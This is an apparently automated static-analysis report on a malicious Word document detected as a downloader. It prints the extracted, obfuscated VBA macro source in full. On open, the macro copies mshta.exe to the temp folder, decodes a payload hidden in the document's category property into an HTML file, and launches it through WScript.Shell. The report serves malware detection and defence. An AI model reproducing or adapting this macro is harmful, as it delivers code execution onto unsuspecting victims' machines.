Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bc166917c1dfacb5…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 103.3 KB
Created: 2020-11-18 19:46:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-11-23
MD5: cadc698a68b06e1418e449f19ab4ae6a
SHA-1: fd004c9b67c0743da808116b485a4d2f2128a9b7
SHA-256: bc166917c1dfacb585a549964621c44502c6994f71749822563b0d0916a4ce2b
Risk score: 138

Heuristics (6)

  • ClamAV detection [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
  • VBA project inside OOXML [medium, OOXML_VBA, 3 related findings]
    Document contains a VBA project (VBA macros present)
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    Matched line in script:
    Call CreateObject("ws" + aoWg0 + "ell").run(ao07zL)
  • AutoOpen macro [low, OLE_VBA_AUTOOPEN]
    Matched line in script:
    Sub AutoOpen()
  • Environ() call (env variable access) [low, OLE_VBA_ENVIRON]
    Matched line in script:
    ahY5Wv = Environ(aKf26N)
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/ (in document text: OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text: OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text: OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text: OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/ (in document text: OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/ (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 13138 bytes
SHA-256: 43f2de4afbefa34446fe3fd0de895f9372b7a99106a8893613f3cf956551f76c
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "aWS0r3"
Sub AutoOpen()
aaNP7
End Sub

Attribute VB_Name = "aSYaq"
Public Const aqDPk As String = ""
Public Const a8WQB As Integer = -1804 + 1817
Public Const a9xAp As String = "1ridn1iw1"
Public Const apUkE As String = "231met1sys1"
Public Const aAQm6 As String = "p1m1e1t"
Public Const aoWg0 As String = "cript.sh"
Function aHr3Lx()
' Grandchild benign to
' Functioning cucumber unpremeditated
' Symbolism
' Herbs palette
' Vocals amend licenses hectic
' Blatant karen chi organisms
' Subdivision
' Outdoors overcrowded
' Jolt specially if unconstitutional passport credible
' Holocaust sooty riverside estonia distinct bowler
End Function
Sub aZdRM(a3Igj)
' Create outlaw nose
' Judaism arid
' Everyone colloquy provincial cnet
' Yes
' Posters sanctified builder whack
' Agency packages compendium potassium
' Conducting sheaf flexible
' Forty-nine file snowboard lithe accuses
' Audience
' Sol considers polish
' Harlem pieces neighborhood constituting
' Welding biological brooch
' Agreed sectors nevada Word
' Bay rent atom healer pickle
' Promotional pedant forty-four obeisance daze ec gerald
' Begat dollars qatar physiognomy belize
' Lakes twist wetted
' Astringent prep englishwoman jeopardy
' Appliances thirty-eight pence
' Mosaic sixty-eight institutional ukraine
' Honduras
' Aggrandizement ng manually
' Cosmopolitan
' Humanities knives congratulation sections notebook
' Emit pest
' Por tacit pastime celebs
' Adjustment molest variables
' Jim voice
' Fermented directory misrule mobility
' Quaff welled mg disc
' Miss puncture contrast deep-rooted
' Humanities bon
' Dairy sublimate shorn britney
' Encore universality debt
' React tusk bull really swarthy positioning
' Undergraduate trivia bigot
' Tombstone madagascar
' Gypsy rotation deadened
' Wards mixer inflammable burdensome
' Sparc annex pain grope ambien topaz
' Ran halter superman animal croquet
' Omissions slash
' Maritime bakery nether
' Aden maiden donation
' Contraction andrea forty-three
' Get possibilities
' Tighten tabs
' Murphy lan
' Edgar
' Polymer corsican dissemble windlass
' Plates inquisitor interest ablaze rubicon homily
' Ahead tic advancement processors province circlet parochial
' Meanwhile socialism minnesota
' Murky road teachers dk
' Chef annexation gripping
' Inimitable paternity discovers inbox
' Ezra pl
End Sub
Function aLyRW(aSK4OD)
aLyRW = ActiveDocument.BuiltInDocumentProperties(aSK4OD)
End Function
Public Sub akvjw()
' Unwell save alike
' Deadening
' Be- processes diane algorithms
' Jet correctly ascendancy sid dna
' Model actress doze secrets discordant acquirement
' Welling thumbzilla diluted gloves minimize
' Presbytery fob script
' Insight dissuade
' Tuneful cup waves
' Arcadian cigarettes
' Outstanding airing
aTi2FV
End Sub
Public Sub aEzSX()
a6CpFn
End Sub

Attribute VB_Name = "a3BuWI"
Public Function ax3MA1(azWlk, aqEIu)
' End era nickname pelf jenny
' Proceed ceres airline abusing conjuncture
' Sneeze nude
' Pawn hash accessibility circumcised slake
' Regions utc guardian
' Widen tormentor conversant pastor bucks prometheus
' Pink stack verandah issues unification
' Rome molecular seaboard fox stingy
' Op. wishlist
' Preservation canvas comedian harrison
' Haiti inventive harm visa
' Corner poet
' Darn sci father
' Hose switching animate
' Affluent farmers vacuum
' Bernard
' Wales creak modeling absurdly
' Gasoline cad surge
' Lets conventual surfing sheer
' Brewer mercy admit largely
' Critical lustrous satiate
' Roller apprise
' Admissions crazy glacial teas
' Mandolin puerile symmetry psychology
' Provide cotton upbraid tones sardinian players
' Success hives brescia
FileNumber = FreeFile
Open azWlk For Output As #FileNumber
' Material gd propaganda claire
' Recluse undaunted tops administered gave mazda
' Dover incapacity
' Overflow hub flash
' Lawfully dictum
' Single motivation silesia
' Jos.
' Tug banking threat fresco
' Mug cancel
' Flimsy spiral sunshine bunny
' Magazines betrayer delectation sorcerer
Print #FileNumber, aqEIu
Close #FileNumber
End Function
Sub a87n6(a9fmxc, a4pS0)
' Night detective para
' Affiliate cynic acquiesce presidents
' Brings
' Ec opposition
' Elucidate alloy johannesburg berlin
' Loan exams
' Lavender travelers berne
' Lymph urls lil jubilee
' Seeds deg efficacious
' Optimistic
' They toothed
' Decades
' Zeke shares lucy pun
' Replaced fun colossus penury batman
' Pox litigation qualified
' Local hock ultram
' Halves spinach conservation
' Bloody supervise statute isa.
' Understand
' Symphony productivity retrospect
' Cropping clyde
' Postulate michigan elements
' Illimitable sucker
' Thoroughbred
' Itinerary esthetic
' Bachelor
' Civilian northeast despot
' Bt crusty
' Gross styles comedy new
' Certain bel intertwined non-commissioned burmese bibliography
' Hewlett braces regulated
' Continuously pavia
' Plow dir fascinating haiti morocco whet
' Carriers william economically costa
FileCopy a9fmxc, a4pS0
End Sub
Function axUtlz(aavX4)
' Scribble excess customize studied proceedings custom
axUtlz = aavX4
End Function
Function a6OR1(aavX4) As String
Dim av5QKE As Long
Dim ak861 As Integer
Dim a9HepW As Integer
For av5QKE = 1 To Len(aavX4)
' Army appointments fake legislator
' For requisition spherical turbulence
' Enact thongs flog
' Damages crumbled continuity strawberry
' Boating
' Marina clock
' Accomplished stave
' Breeder chick
' Midway lean rivet
' Resumes fy futures
' Participating thongs brunswick scraggy
a9HepW = 0
ajzAa = Mid(aavX4, av5QKE, 1)
' Secretion shrub zoological commission tribune inspections
ak861 = Asc(ajzAa)
If (ak861 > aMxW0q(29093 / 29093) And ak861 < aMxW0q(-2301 + 2303)) Or (ak861 > aMxW0q(4574 - 4571) And ak861 < aMxW0q(1431 - 1427)) Then
a9HepW = a8WQB
ak861 = aFWA5G(ak861, a9HepW)
' Disorderly
' Undersigned aperture relevance
' Jackal flout autobiography idol tolerate sentences
' Slight abaft pupils ratification
' Compunction
' Primacy
' Wild outdoors
' Mr
' Yields watershed
' Laser sur special tries
If ak861 < aMxW0q(5) And ak861 > 83 Then
ak861 = aQYdcB(ak861)
ElseIf ak861 < 5655 / 87 Then
ak861 = aQYdcB(ak861)
End If
End If
' Translucent dirty bastard pulling humid
auYtHB = azw6S(ak861)
' Disruption fetish renew cull
Mid$(aavX4, av5QKE, 1) = axUtlz(auYtHB)
Next av5QKE
a6OR1 = aavX4
End Function

Attribute VB_Name = "aSQFt"
Function ag3ByP(adPHF)
' Pointed
akNac4 = adPHF
aIRf3i = Len(akNac4)
For aQYzm = 0 To aIRf3i - 1
a27i1T = a27i1T & Mid(akNac4, (aIRf3i - aQYzm), 1)
Next aQYzm
' Canvas covers discretionary hearts
' Needed overflow
' Ot lattice needs
' Base magnanimity asbestos
' Whereas tweed celibacy join charged immune
' Subway preparation sci burlesque
' Slut chine hayes narrate ed
' Inscrutable whove
' Cravat recovery critical tracks amenable
' Wikipedia woo scholastic
' Praiseworthy samoa
ag3ByP = a27i1T
End Function
Public Function am7UDW(aYRNwT)
' Find harley abasement
' Standing cull statement knowing appliances
' Ensures seduction
' Restore pus
' Diurnal
' Sandal emma baffle
' Quorum demonstrates optics
' Surrounding kathy phoenicia width
' Psyche lather depend illegally
' Adhesion orleans
' Fireplace sluggard dale
am7UDW = Replace(aYRNwT, aqDPk, "")
End Function
Sub aaNP7()
' Ilk stayed
' Quarter biology
' Corporation bra ga vs
' Crash formatting queue harmed explode
' Jj
' Accords tri reek theater homicide
' Pulse jennifer
' Vibrator disobey praiseworthy leading revisions
' Printable execrable probate
' Yuan herbs communication armenia succor
' Beryl dishonesty
akvjw
' Karl petrograd lobster thaw commensurate
aEzSX
' Happening revoke outdoors delirious
' Bloggers
' Retro recipe timing replied
' Brought raw flexible voters radium
' Sphinx wreckage brackish
' Vitiated wrapped opinions classroom mitsubishi
' Actress immune reliance oust
' Rear accomplishes open-mouthed
' Cruz amino
' Baseness
' Please
Call CreateObject("ws" + aoWg0 + "ell").run(ao07zL)
End Sub

Attribute VB_Name = "a5ke6i"
Function ahY5Wv(aKf26N)
ahY5Wv = Environ(aKf26N)
End Function
Function adpie()
' Significant troubadour
' Pokemon buckskin photographic
' Bight ebony
' Hell grid
' Ghz abdicated armistice grieving ge
' Pentecost teens oops
' Advertiser sapphire antidote
' Demise instrumentation debase sheath
' Gains modem bandwidth leicestershire rewritten
' During detector acetylene justin
' Ornate collaboration graft sacred buyers
With Application
adpie = .PathSeparator
End With
End Function
Function aBf7gM(aCIX7)
aknBD = VBA.Split(ag3ByP("lmth.ni|moc.ni|exe.athsm"), "|")
' Jeremy smith shant mammoth incautious
' Roped triton pix
' Protestant tricky
' Psalm unchallenged ment az
' Stratum chapters safari bravado rx
' Arm armament healthcare quarter moodily generated
' Metropolitan
' Discrepancy fiber pf seedling boding
' Cute phial sicken pork tried
' Fx attempting clusters reel
' Coroner
' Won ammonia sold
' Bargains lesson
' Peeps pulp cruises
' Canvas ag
' Teen psi end accommodated
' Enclose cognizant workforce
' Capitulate affiliates refund emphasis
' Dot adidas marl indivisible warrant
' Flap
' Ebooks
' Self-evident jd
' Preferment belligerent street
' Treatments auctions priority
' Playstation fie one-sided
' Inopportune endorsement moth lama initially earned
' Broadest ninety-six jointed schism
' Eucalyptus insides equivalent
' Heather
' Smirk cheat ever accosted album dialectic
' Consoles wolf
' Folklore pacify confronts quail seedy
' Improvement ferrara dumbfounded receivers bay uncanny joyously
' Geographical miscreant engrave
' Applications
' Fancy horoscope
' Mush refresh nipples viewer
' Appropriateness frankfurt interment admin eruption
' Brazilian
' Memories
' Clothing can nevada
' Jostle academy auction
' Hart ya
Select Case aCIX7
' Balance rings tutelary
Case 0:
aBf7gM = ahY5Wv(Replace(ag3ByP(a9xAp), "1", "")) & adpie & Replace(ag3ByP(apUkE), "1", "") & adpie & aknBD(0)
Case 1:
' Admonish pmid focal ajax
aBf7gM = ahY5Wv(Replace(ag3ByP(aAQm6), "1", "")) & adpie & aknBD(1)
Case 2:
' Publicity clear fwd satyr footprint
aBf7gM = ahY5Wv(Replace(ag3ByP(aAQm6), "1", "")) & adpie & aknBD(2)
End Select
End Function
Sub a6CpFn()
apBfx = aAnig(aBf7gM(2))
ax3MA1 apBfx, a6OR1(aLyRW("category"))
End Sub

Attribute VB_Name = "axANo"
Function aR24kl(aVwnIt)
' Discount
' Escutcheon housewares scoop observe
' Endearing insecurity possibility
' Elm atrium win information marl milton
' Thracian registered garbage insured
' What tests licentiousness instructions maria equation
' Successful
' Clocks
' Diver institutes upskirt
' Annihilation designing barcelona struggle crammed die
' Unfold postcards deeply
' Acquirement magnanimously est rings loon
aR24kl = (am7UDW(aVwnIt))
End Function
Function amraT(anLoWJ)
' Dial debtor chamois
' Costa florist
' Myth stud dock
' Www
' Safer breakfast super
' Kent incidentally incongruity
' El vertex
' Madeira login
' Ventricle baths clip subject-matter
' Relaxation distributor gourd reducing
' Syndrome riband ledger newman
amraT = (am7UDW(anLoWJ))
End Function
Function aAnig(aL1gr)
' Tryst squalid
' Boor projects
' Foreground cunt wright sh leicestershire adulterous baleful
' Travel catalogs
' Indicated billow characterized derived
' Returned specifies correlation
' Insolvent harry strict raven
' Manipulation cassock rear
' Cambridge fragrances cold-blooded
' Accessibility
' Completing useful feet
' Firefox instance
' Mu fluently sealskin possible trans
' Overdone geological victoria footnote
' Ellipse cramps impropriety
' Stomach
' Multiple potash forte
' Intestine poplar yr manger
' Violent verzeichnis martinique
' Crabs sniff fabled realistic
' Fulfill invention hampton
' Knoll herbaceous steve
aAnig = (am7UDW(aL1gr))
End Function
Function ao07zL()
azhHv = amraT(aBf7gM(1))
a8JYM = aAnig(aBf7gM(2))
ao07zL = azhHv & " " & a8JYM
End Function

Attribute VB_Name = "aTRMGv"
Sub aTi2FV()
adwHqc = aR24kl(aBf7gM(0))
aLw4T = amraT(aBf7gM(1))
a87n6 adwHqc, aLw4T
End Sub
Function aQYdcB(afIGKQ)
aQYdcB = afIGKQ + 1285 - 1259
End Function
Function aMxW0q(aoZuP)
If aoZuP = 0 Then
aMxW0q = 25105 - 25104
ElseIf aoZuP = 1 Then
aMxW0q = 7808 / 122
ElseIf aoZuP = 2 Then
aMxW0q = 437 - 346
ElseIf aoZuP = 3 Then
aMxW0q = -79 + 175
ElseIf aoZuP = 4 Then
aMxW0q = -33 + 156
ElseIf aoZuP = 5 Then
aMxW0q = -241 + 338
Else
aMxW0q = 1012 + 12
End If
End Function
Function aFWA5G(afIGKQ, avWiSh)
aFWA5G = afIGKQ - avWiSh
End Function
Function azw6S(afIGKQ)
azw6S = VBA.ChrW(afIGKQ)
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 53248 bytes
SHA-256: 72c9aa036d5bc982fb5dcda8a76a4e84293dd2873e553fdce3e1dd13854cbfec